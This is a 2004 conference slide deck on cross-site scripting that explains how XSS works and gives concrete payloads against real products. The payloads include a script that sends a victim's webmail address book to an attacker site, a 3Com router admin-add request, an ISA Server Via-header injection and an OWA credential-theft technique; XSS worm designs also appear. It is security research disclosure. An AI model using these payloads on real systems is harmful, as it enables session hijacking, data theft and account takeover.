The document summarizes a presentation on cross-site scripting (XSS) attacks. It discusses how XSS works, where it can be exploited, and examples of XSS vulnerabilities. Specific examples covered include XSS in 3Com routers, Inktomi Traffic Servers, Iplanet messaging servers, Microsoft ISA servers, and Outlook Web Access. The presentation also discusses how XSS could be used in worms and trojans to spread malware or steal user information.

1. FIST Conference March 2004
Not only a XSS
Toni Cortès Martínez
Infohacking Research

2. GUIDELINE
 Guideline
 Introduction
 XSS Today
 Let’s see some XSS
Infohacking Research 2 Not O

3. Introduction
 What’s this?
 XSS?
 How it works?
 Where it works?
 Application level security.
 OK, but it’s only a XSS.
Infohacking Research 3 Not O

4. XSS
 XSS (common attacks)
 When somebody can exploit user inputs to get a non expected
response.
 The error it’s usually due to a poor filtering on user inputs and/or
on the output from dynamically generated pages.
 This could allow access to something restricted to user, for
example: session credentials (cookies, session Id’s, etc.)
Infohacking Research 4 Not O

5. How it works
 How it work’s
Attacker must trick the victim to make a special HTTP request.
 Usually exploited on web environment:
1) Webmails
2) Web forums
3) Any web application (dynamic content) that allows user interaction
 Other applications that render some output in HTML (log viewers, mail
clients)“HTML inyection”. (like ILLC techniques)
 Exploits a non secure programming methodology.
 The attacker usually wants the victim to do something:
 Sends out some cookie (session or permanent)
 Make an HTTP request for you ;)
 The goal of XSS: We are on the victim environment.
Infohacking Research 5 Not O

6. How it works
 How it works, example
 We found a flaw on a server (ex: online bank with email service)
 Construct a special request to explot this flaw (XSS), and obtain
user credentials.
 Send a message to the victim (with window.open, img src, etc.)
 Wait for the user access and get the session track cookie.
 Access to the online bank with user credentials (stolen cookie)
 Now we are this user for a few time.
Infohacking Research 6 Not O

7. Where it works
 Where it Works?
 Any dynamic generated content dependant on user’s input it’s a
potential XSS security hole.
 Enter your name: Toni
 Hi Toni
 Simple example of explotation on a dynamic page:
 Enter your name: Toni<script>alert(‘Hello XSS’)</script>
 Hi Toni
Infohacking Research 7 Not O

8. Application level security
 Nowadays, the application level security is one of the
computer challenges.
 Application level firewalls like HIVE or layer 7 filters.
 Client side security it’s out of control for webmasters.
 Servers can only do their best trying to filter any data coming
from client side.
 Fact: most of the XSS based attacks and vulnerabilities are easy
to exploit.
 No special skills are needed -> script kiddies.
 XSS is useful to impersonate a user but doesn’t provide a
direct or easy way of controlling a computer…umm, well, you
still can do lot of things ;-)
Infohacking Research 8 Not O

9. OK, but it’s only a XSS.
 OK, but it’s only a XSS…
 Yes, XSS attacks seem to be harmless by itself, but they could open
other attack vectors.
 We can gain access to a web-admin tool.
(IIS 6.0 Web Admin XSS vulnerability)
 XSS, breaks with old HTTP session tracking methods: use of ID’s on
the URL, cookies and also source IP based authentication.
(Iplanet Messaging Server XSS vulnerability)
 Combination of XSS with other flaws to launch a more complex
attack:
-HOTMAIL XSS and AV bypass
-Microsoft User Domain Credendials access via OWA XSS (via XST)
Infohacking Research 9 Not O

10. XSS Today
 XSS today
 XSS, next generation attacks.
 Proof of concept: HTTP redirection
 XSS based worms & trojans
 XSS worm
 XSS trojan
 Anyone could be affected by XSS
Infohacking Research 10 Not O

11. XSS Next Generation
 XSS next generation attacks.
 HTTP response redirection (information leak)
(Zeus Web Admin XSS)
 HTTP bouncing (Full interactive)
… under construction 
Infohacking Research 11 Not O

12. HTTP Redirection
 Proof of concept: HTTP redirection
 Example of an evil link that steals address book of the victim ‘s webmail:
http://<target>/vulnerable.cgi?variable=<script>function%20pedo(){var
%20xmlHttp%20=%20new
%20ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open("GET","http://<t
arget>/address_book.cgi",false);xmlHttp.send();xmlDoc=xmlHttp.respons
eText;window.open(“http://www.infohacking.com/data_collector.php?
response=“+xmlDoc);} pedo();</script>
Infohacking Research 12 Not O

13. HTTP Redirection
 Which means:
http://<target>/vulnerable.cgi?variable= (server path to script inyection)
<script>
function pedo()
{var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
xmlHttp.open("GET","http://<target>/address_book.cgi",false); // MAKE REQUEST
xmlHttp.send();
xmlDoc=xmlHttp.responseText; // STORE RESPONSE
window.open(“http://<attacker_site>/“+xmlDoc);} // SEND RESPONSE TO ATTACKER
pedo();
</script>
Note: we use “window.open” to send response in order to bypass “xmlHttp.open”
security restrictions.
Infohacking Research 13 Not O

14. XSS based worms & trojans
 General “features”
 Spreading trough webmail servers
 Self decrypting script routine
 Can modify permanent cookies (trojan)
 Can force session logout (D.o.S.)
 Can impersonate the user
 Can steal information (mail content, address book, etc)
 Hard to be detected by AV software (encrypted payload)
 If no user action is needed (as XSS on some field of the mail)
then the spreading will be very fast!
Infohacking Research 14 Not O

15. XSS worm
 How it works:
 Once executed, the script will self decrypt and try to detect the
source (Hotmail, Yahoo, Terra, …) or the webmail software
(Iplanet, etc). It can be done with a simple “document.URL”, and
comparing with some patterns.
 If the source is known try to get address book
 Filter only webmail addresses
 Auto send routine
Infohacking Research 15 Not O

16. XSS trojan
 How it works:
 Once executed, the script will self decrypt and try to set a
permanent cookie (will be stored on victim’s hard disk)
 The modified cookie could change some option: it can set
Chinese language as default ;-) (D.o.S.)
 The modified cookie could redirect the victim to some place on
the server that is controlled by the attacker (changing some
profile setting in the cookie)
As worms, trojan could try to spread away…
Infohacking Research 16 Not O

17. Anyone can be affected by XSS
 Recent example: ViewCVS.py
Affected sites: Sorceforge.net, Apache.org, Iptables.org.
Those sites are well known to everybody, are probably they are
managed by security concerned people…
… anyway, they still can be exposed to XSS risks…
Infohacking Research 17 Not O

18. Sourceforge.net
Infohacking Research 18 Not O

19. Apache.org
Infohacking Research 19 Not O

20. Iptables.org
Infohacking Research 20 Not O

21. XSS Examples
 Some XSS examples from Infohacking Research
 3Com 812 ADSL router -> we add a new admin
 Inktomi Traffic Server -> all user vulnerables by this XSS
 Iplanet Messaging Server -> session hijack
 Microsoft ISA Server ->
 OWA XSS -> Access to user credentials
Infohacking Research 21 Not O

22. XSS on 3com ADSL router
 There is a lot of XSS present on the OCR812
 http://<ip_of_OCR812>/<script>document.write("<b>WE_CAN_I
NJECT_CODE</b>")</script>
Infohacking Research 22 Not O

23. XSS on 3com ADSL router
 With XSS we can insert new users to our router
 We can use windows.open, or <img src=..> to make our special
request
 /
Forms/admin_telnet_add"+String.fromCharCode(63)+"uumUserN
ame=infohacking&uumUserPassword=
Infohacking Research 23 Not O

24. XSS on 3com ADSL router
 We can make the complete process if we know IP, user and
password (by example, old admin)
<html>
<img src="<ip_or_name_of_OCR812>/legalizacion_marihuana.jpg">
<script type="text/javascript">
var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP")
xmlHttp.open("GET", "<YOUR_FUCKING_REQUEST>,false)
xmlHttp.setRequestHeader("Authorization:", "Basic
User:Password(base64 encoded)")
xmlHttp.send()
</script>
</html>
Infohacking Research 24 Not O

25. Inktomi Traffic Server XSS
 Inktomi Traffic Server is a proxy cache used on several
countryes by ISP
 Also know in Spain as “Proxy cache de Telefónica”
 A special request by a client passing through the Inktomi Traffic-
Server causes an error page generated by the proxy. This
dynamic error page is vulnerable to Cross Site Scripting...
 Indirectly any server whose clients come trough the Traffic-
Server and using cookies to track sessions are "vulnerable".
 The client making the request IS UNABLE to distinguish what
domain generated this code...
Infohacking Research 25 Not O

26. Inktomi Traffic Server XSS
 Exploit?
 We test it over 5.5.1 version.
 Only need configure a proxy on ANY IP with port 80.
 Make a special request.
http://<spoofed_domain>:443/</em><script>alert()</script>
We can see the script executed on our browser, “generated” by
the spoofed domain. Now, we can access to cookies, and
everything, like man in the middle attack.
Infohacking Research 26 Not O

27. Iplanet messaging server XSS
 This webmail, Iplanet messaging server allow us hijack
the SID.
 This server allows "online" opening of file attachments. This
means that any html file will be opened by the client browser in
the IPlanet webmail domain context. Wonderful XSS ;-)
Now we can explode this XSS with a html
attach.
With document.URL we obtain the SID and userid (located on the
URL)
With the SID, we gain access to all attach.
http://<iplanet_host>/attach/file.html?
sid=XYXYXYXYXYXYXY&mbox=INBOX&uid=XXXXX
&number=2&filename=file.html
Infohacking Research 27 Not O

28. Iplanet messaging server XSS
 But this is not easy…. Iplanet webmail include a IP
session tracking.
 When we can use the hijacked SID?
 If we are near the victim, behind a NAT device, we can access
with his SID.
 We can stole the session to all people who access trough a
transparent proxy (like transparent proxy devices).
 Or we can create a script to force user make request and redirect
to us. Of course… they don’t see anything… (see above)
Note: a lot of web server use the same session-cookie on both http and
https domains. (This note is for the online bank developers).
Infohacking Research 28 Not O

29. Microsoft ISA Server XSS
 This example shows an XSS exploited using headers
 When we try to go an unreachable url trought ISA Server. ISA
generate an error page, showing some data (the content of “via
header”).
 We fix this header.
 Now we can request a non-existent URL into an existent domain.
(usually server use the same cookie on all his domain)
 Steal cookies 
 Access.
 We don’t need a flaw on the server code. Use ISA Server
instead.
Infohacking Research 29 Not O

30. ISA Server Exploit
<html>
<body>
<script type="text/javascript">
alert("Click OK then wait for a few seconds...")
var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP")
xmlHttp.open("GET", "http://www.infohacking.com:113", false)
xmlHttp.setRequestHeader("Via",
"CODE_INJECTED_IN_VIA_HEADER<script>alert
("ISA_SERVER_XSS_by_INFOHACKING")</script>")
xmlHttp.send()
xmlDoc=xmlHttp.responseText
document.write(xmlHttp.responseText)
</script>
</body>
</html>
Infohacking Research 30 Not O

31. OWA XSS
 What we have here?
 With OWA you can see an HTML formatted e-mail
 A user must click on a special link for this purpose in the webmail
interface, and an alert will pop-up.
 To avoid people executing malicious content in the client
browser, the OWA will try to filter the content of the mail.
Good, but… no
enough.
Infohacking Research 31 Not O

32. Disabling OWA filtering
 The URL to view an HTML formatted mail is something like this:
http://<IP_or_name_of_the_server>/exchange/<username>/<inbox_name>/<su
bject>.EML/1_multipart/2_text.htm?Security=1
Good name for a parameter, other name maybe “change_this_for_fucking_us”
 We only need to quit this parameter, and OWA don’t apply the filter.
Infohacking Research 32 Not O

33. OWA XSS
 Obtaining data to create our special link.
 We need IP or hostname of the server, user name and subject.
 All this we can found on the “referer” header of an HTTP request
coming from a link in the body of message.
<img src="http://<site_of_the_attacker">
 Now with referrer, we can send our attack.
 We have the IP or hostname of server (from referrer)
 We have the user name (from referer)
 We know the subject
 We create a link in the body of message, without the
“security” parameter. (link to the same message without
security parameter)
Infohacking Research 33 Not O

34. OWA, Stolen credentials
 Nothing else?
 OWA uses cookies to track the HTTP session, but also uses
"Basic Auth" for... more security? ;-)
 This “Basic Auth” (-> base64 encoded user:passwd) contains the
user credentials for this domain.
 To access the "Basic Auth" header, the easiest way is via an http
"TRACE" request...and the IIS (Internet Information Server) by
default will allow those kind of requests.
Infohacking Research 34 Not O

35. XSS
 That’s all folks??
Of course, as always, imagination of the attacker is the only limit...
much more fun is possible.
Thanks For Your attention.
Infohacking Research 35 Not O

36. FIST Conference March 2004
Not only a XSS
© Toni Cortes Martinez & Hugo Vazquez Carames
Infohacking Research
Barcelona, 7 May 2004